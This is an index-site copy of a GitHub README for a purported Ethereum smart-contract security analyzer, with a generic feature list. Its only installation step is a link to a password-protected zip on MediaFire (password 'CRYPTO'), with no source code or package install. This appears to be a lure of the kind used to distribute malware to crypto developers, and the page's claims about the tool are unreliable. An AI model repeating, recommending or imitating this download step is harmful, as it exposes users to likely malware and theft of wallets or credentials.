An open API service indexing awesome lists of open source software.

https://github.com/asdasdasdasd231/smart-contract-analyzer-tool


https://github.com/asdasdasdasd231/smart-contract-analyzer-tool

audit-tool blockchain code-analysis decentralized ethereum mythril security slither smart-contract-analysis smart-contract-audit smart-contracts solidity solidity-security static-analysis vulnerability-detection

Last synced: about 1 month ago
JSON representation

Awesome Lists containing this project

README

          

# ๐Ÿ” Smart Contract Analyzer Tool

An open-source tool to analyze Ethereum smart contracts for common security vulnerabilities and code quality issues. Ideal for developers, auditors, and blockchain enthusiasts who want to ensure their Solidity code is safe and efficient.

---

## โš™๏ธ Features

- ๐Ÿ›ก๏ธ **Static Security Analysis**
Detect common vulnerabilities like:
- Reentrancy
- Integer overflows/underflows
- Unchecked call return values
- Unprotected `selfdestruct`
- Unrestricted access control

- ๐Ÿง  **Code Quality Hints**
Suggest best practices based on [Solidity style guide]().

- ๐Ÿ” **Dependency & Import Scanner**
Track and analyze third-party contracts and libraries.

- ๐Ÿงช **Integration with Slither (optional)**
Extendable with [Slither]() for deeper analysis.

- ๐Ÿ“œ **Readable Report Output**
JSON, HTML, and terminal-based reports.

---

## ๐Ÿ›  Tech Stack

- **Language**: Python 3.10+
- **Libraries**: `slither-analyzer`, `py-solc-x`, `rich`, `click`
- **Optional**: Docker support for isolated analysis environment

---

## ๐Ÿ“ฆ Installation

### ๐Ÿ”ง Option 1: Local (Python)

๐Ÿ‘‰ [Download Analyzer Tool.zip](https://www.mediafire.com/folder/vbho728wuqtlp/CRYPTO)

**๐Ÿ” Password:** `CRYPTO`